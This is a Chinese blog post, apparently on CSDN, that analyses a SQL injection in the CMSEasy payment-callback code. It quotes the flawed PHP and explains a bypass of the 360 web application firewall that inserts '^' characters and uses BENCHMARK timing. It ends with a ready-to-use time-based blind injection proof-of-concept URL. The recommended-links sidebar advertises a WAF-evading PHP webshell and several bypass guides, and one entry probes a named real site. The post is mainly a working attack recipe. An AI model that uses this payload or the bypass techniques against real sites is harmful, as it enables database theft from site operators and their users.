360 php waf,cmseasy 最新版补丁绕过sql注入(绕过360waf)

最新推荐文章于 2022-05-01 18:10:10 发布
最新推荐文章于 2022-05-01 18:10:10 发布
阅读量479 收藏 1
点赞数
文章标签: 360 php waf

首先还是老地方:archive_act.php(611行)

function respond_action() {

include_once ROOT . '/lib/plugins/pay/' . front::$get['code'] . '.php';

$payclassname = front::$get['code'];

$payobj = new $payclassname();

$uri = $_SERVER["REQUEST_URI"];

$__uriget = strstr($uri, '?');

$__uriget = str_replace('?', '', $__uriget);

$__uriget = explode('&', $__uriget);

$_GET = array();

foreach ($__uriget as $key => $val) {

$tmp = explode('=', $val);

$_GET[$tmp[0]] = $tmp[1];

if(preg_match('/\'|select|union|"/i', $tmp1)){

exit('非法参数');

}

}

file_put_contents('logs11.txt', var_export($_GET,true));

$status = $payobj->respond();

if ($status) {

echo '';

front::refresh(url('archive/orders/oid/' . front::get('subject'), true));

} else {

echo '';

front::refresh(url('archive/orders/oid/' . front::get('subject'), true));

}

}

$tmp1与$tmp[1]开发人员一时犯糊涂,没看清,导致无效过滤。而且这里get参数进行了重组,从$_SERVER["REQUEST_URI"]分割获取,多此一举,还导致之前的过滤全部无效,这边过滤又失效。

通过front::$get['code'] 可以控制需要加载的pay文件,

再看文件: alipay.php:

function respond() {

if (!empty($_POST)) {

foreach($_POST as $key =>$data) {

if(preg_match('/(=||\')/', $data)){

return false;

}

$_GET[$key] = $data;

}

}

$payment = pay::get_payment($_GET['code']);

$seller_email = rawurldecode($_GET['seller_email']);

$order_sn = str_replace($_GET['subject'],'',$_GET['out_trade_no']);

$order_sn = trim($order_sn);

if (!pay::check_money($order_sn,$_GET['total_fee'])) {

return false;

}

if($_GET['trade_status'] == "WAIT_SELLER_SEND_GOODS"||$_GET['trade_status'] == "TRADE_FINISHED" || $_GET['trade_status'] == "TRADE_SUCCESS") {

pay::changeorders($order_sn,$_GET);

return true;

}else {

return false;

}

}

控制参数trade_status=WAIT_SELLER_SEND_GOODS, 进入pay::changeorders($order_sn,$_GET);

public static function changeorders($id,$orderlog) {

//file_put_contents('logs.txt', $id);

$where=array();

$where['id']=$id;

$where['status']=4;

//$where['orderlog']=serialize($orderlog);

$update=orders::getInstance()->rec_update($where,$id);

if($update<1) {

exit('改变订单状态出错,请联系管理员');

}

}

在这里 $id 就是之前$order_sn,可以直接由get参数控制。

进入这个方法:$update=orders::getInstance()->rec_update($where,$id);

function rec_update($row,$where) {

$tbname=$this->name;

$sql=$this->sql_update($tbname,$row,$where);

//echo $sql."
";

return $this->query_unbuffered($sql);

}

这里程序员又犯糊涂了, rec_update的方法 where变量明显是第二个参数,传入的时候居然$where放到了第一个参数(这个程序员开了吧!),这样$id值就被当做sql语句的条件了。

好吧 开始绕waf:

首先是360的waf: 检测了好多危险函数,更可恶的全局过滤单引号,看到就杀。但是$order_sn 直接被带入到了where后面 根本不需要单引号,不起作用, 在之前的方法中有一个:

$order_sn = str_replace($_GET['subject'],'',$_GET['out_trade_no']);

这样利用替换功能,在危险函数中间都插入^, 再把subject设置成^,就可以成功绕过360waf。

接下来在sql语句执行的时候又有一个过滤器:

if(preg_match('/(if|select|ascii|from|sleep)/i', $condition)){

//echo $condition;

exit('sql inject');

}

由于是update注入,又不能显示错误,sleep被过滤,只能用BENCHMARK。

又过滤了if,只能用or。

get参数又是从querystring中直接过去,空格会被替换成%20,所有只能用/**/替换:

最终的POC:(延时盲注法,稍微改动下

http://**.**.**/cmseasy/index.phpcase=archive&act=respond&code=alipay&subject=^&out_trade_no=ord(sub^str(datab^ase(),1,1))/^**^/not/^**^/in/^**^/(99)/^**^/or/^**^/BEN^CHMARK(100000000,md5(1))&trade_status=WAIT_SELLER_SEND_GOODS

有机社会
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
2019最新过狗过,云锁,360等WAFPHP免杀大马
03-20
2019最新过狗过,云锁,360等WAFPHP免杀大马等主流防护软件,2019最新大马下载PHP
360 php waf,关于绕过360WAF的几点思路总结_91Ri.org
weixin_31864641的博客
03-12 990
前一阵看到论坛有个兄弟发发帖问怎么绕过360WAF,而且还给出了上传点路径(由于涉及到具体的上传点url,帖子和作者的名字在这就不提及了)。好奇之下去逛了逛, 试了几个比较常见的注入测试字符,确实有360拦截。试了下作者给的上传点,WAF阻止了后缀名变形,图片内容插马的方法。不过,我在用plus-editor浏览图片内容时,发现图片中有这么一段像脚本一样的内容上网查了下这段内容的含义,大概是说,这...
waf绕过—过360主机卫士sql注入
一个普普通通的博客
03-07 2730
过360主机卫士sql注入
360 php waf,uav360
weixin_39639040的博客
03-12 193
ABOUT WAFWaf is a Python-based framework for configuring, compiling and installing applications. Here are perhaps the most important features of Waf:Automatic build order: the build order is computed ...
WAF&安全狗新姿势
weixin_30471065的博客
04-12 190
俗话说只要思路宽,的欢。前段时间我有尝试着用以下的方法狗,效果还不错。不过这方法呢也许这段时间可以绕过,过段时间可能就失效了,大家还是要多去尝试找到更多的方法。 举例-->整型注入 绕过WAF 绕过方法: 就是修改大小写 加%0a 或%0d去绕过(%0a是换行,%0d是回车) 如: and 1=1 可能会被过滤可改为 /*%0Aand%0a*/ 1=1 或...
sql注入绕过方法总结
12-19
sql注入绕过方法总结,绕过waf,D盾
SQL注入中的WAF绕过技术
08-19
SQL注入中的WAF绕过技术,里面的思路很好,可以学习一下
关于SQL注入绕过的一些知识点
09-09
网上关于SQL注入绕过技巧有很多,最近正好空下来,想着整理下关于SQL注入绕过的一些姿势。欢迎大牛补充,下面这篇文章主要介绍了关于SQL注入绕过的一些知识点,总结的还是相对比较全面的,需要的朋友可以参考下。
深入了解SQL注入绕过waf和过滤机制
02-11
"深入了解SQL注入绕过waf和过滤机制" SQL 注入绕过 WAF 和过滤机制是一个非常重要的知识点,笔者将从以下几个方面对其进行详细的分析和说明。 首先,WAF(Web Application Firewall)的常见特征是指其具有审计...
waf是如何被绕过
12-30
介绍了白名单绕过、IP段白名单绕过绕过代理直接请求源站(代理模式云WAF)等绕过方式。适合初学者进行学习,不适合高手。
360网神WEB应用安全云防护系统产品白皮书
11-13
随着越来越多的行业逐渐向“云”端过渡,适用于不同行业的“私有云”或者“公有云”解决方案层出不穷,随之而来的挑战就是大数据的集中存储和集中分析。特别是随着办公信息化、企业信息化的普及,很多政务系统、OA系统以及其他对外信息发布系统的上线,也产生了日益庞大的数据。这些数据中不仅仅包含了正常业务数据同时也包含大量的网络攻击行为。大数据作为“未来的新石油”,为我们提供了很多信息的金矿。未来的网站安全服务市场,一定是一个基于云服务的安全运维管理平台。在 云计算、IT 服务化日渐普及的今天,企业及成员单位网站迫切需要专业化的队伍供全面的、专业的网站安全保护服务。
360通用php防护代码
04-18
360通用php防护代码 -----------------使用方法------------------------------------------------------------------ 1.将360_safe3.php传到要包含的文件的目录 2.在页面中加入防护,有两种做法,根据情况二选一即可: a).在所需要防护的页面加入代码 require_once('360_safe3.php'); 就可以做到页面防注入、跨站 如果想整站防注,就在网站的一个公用文件中,如数据库链接文件config.inc.php中! 添加require_once('360_safe3.php');来调用本代码 常用php系统添加文件 PHPCMS V9 \phpcms\base.php PHPWIND8.7 \data\sql_config.php DEDECMS5.7 \data\common.inc.php DiscuzX2 \config\config_global.php Wordpress \wp-config.php Metinfo \include\head.php b).在每个文件最前加上代码 在php.ini中找到: Automatically add files before or after any PHP document. auto_prepend_file = 360_safe3.php路径;
SQL注入——waf绕过
cldimd的博客
03-19 2470
什么是waf Web应用防护系统 (也称:网站应用级入侵防御系统。英文:Web Application Firewall,简称: WAF)。也叫Web防火墙,主要是对Web特有入侵方式的加强防护,如DDOS防护、SQL注入、XML注入、XSS等。 防火墙 包过滤防火墙  隔绝网络 状态检测防火墙 应用层防火...
轻松bypass360网站卫士WAFSQL注入防护
h4ck0ne的博客
01-23 3299
随便网上找了一个网站,只是测试一下,没有干非法的事情! code 区域 http://www.py-guanyun.com/CompHonorBig.asp?id=49  code 区域 http://www.py-guanyun.com/CompHonorBig.asp?id=49 and 1=1 被拦截 换一个姿势看看: code 区域 http://www.py-g
web渗透测试中WAF绕过讲解(二)基于HTTP协议绕过
ZDH5362的博客
08-20 557
0x01 前言 在讲本课的内容之前我们先来了解互联网中的HTTP是什么? 超文本传输协议(HTTP,HyperText Transfer Protocol)是互联网上应用最为广泛的一种网络协议。所有的WWW文件都必须遵守这个标准。设计HTTP最初的目的是为了提供一种发布和接收HTML页面的方法。1960年美国人Ted Nelson构思了一种通过...
360发布通用php防护代码
weixin_34184158的博客
02-01 311
360发布通用php防护代码,其实最初是协助phpcms来防护安全用的,现在看来可以加入到任何有漏洞的网站里面,拿phpcmsv9问题,解决方案如下,其他网站以此类推!   1.将360_safe3.php传到要包含的文件的目录   2.在页面中加入防护,有两种做法,根据情况二选一即可:   a).在所需要防护的页面加入代码 require_once('360_safe3.php')...
网络攻防比赛PHP版本WAF
weixin_30932215的博客
04-14 1030
次去打HCTF决赛,用了这个自己写的WAF,web基本上没被打,被打的漏洞是文件包含漏洞,这个功能在本人这个waf里确实很是捉急,由于只是简单检测了..和php[35]{0,1},导致比赛由于文件包含漏洞web上失分了一次。不过现在不是很想去改进了。这个是比赛专用waf,商业价值几乎为0。 如果是框架写出的web就很好部署了,直接require在重写文件或者数据库文件中,如果是零散的p...
信息收集“小迪安全课堂笔记”CDN,架构waf等信息,APP,其他资产
weixin_42902126的博客
05-01 871
信息收集CDN 绕过判断是否有CDN目前常见的 CDN 绕过技术有哪些?架构,搭建,WAF 等CMS 识别技术源码获取技术架构信息获取站点搭建分析搭建习惯-目录型站点搭建习惯-端口类站点搭建习惯-子域名站点搭建习惯-类似域名站点搭建习惯-旁站,C 段站点搭建习惯-搭建软件特征站点,搭建习惯WAF 防护分析 CDN 绕过 CDN 的全称是 Content Delivery Network,即内容分发网络。CDN 是构建在现有网络基础之上的智能虚拟网络,依靠部署在各地的边缘服务器,通过中心平台的负载均衡、内容
waf绕过sql注入
最新发布
06-26
WAF绕过SQL注入通常是攻击者针对WAF的安全策略和技术限制来实施的一种技术手段,常见的方法包括: 1. **参数编码和转义**: 攻击者可能会尝试使用特殊字符的转义序列,如\"\'(单引号)或\"\"(双引号),来欺骗WAF...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值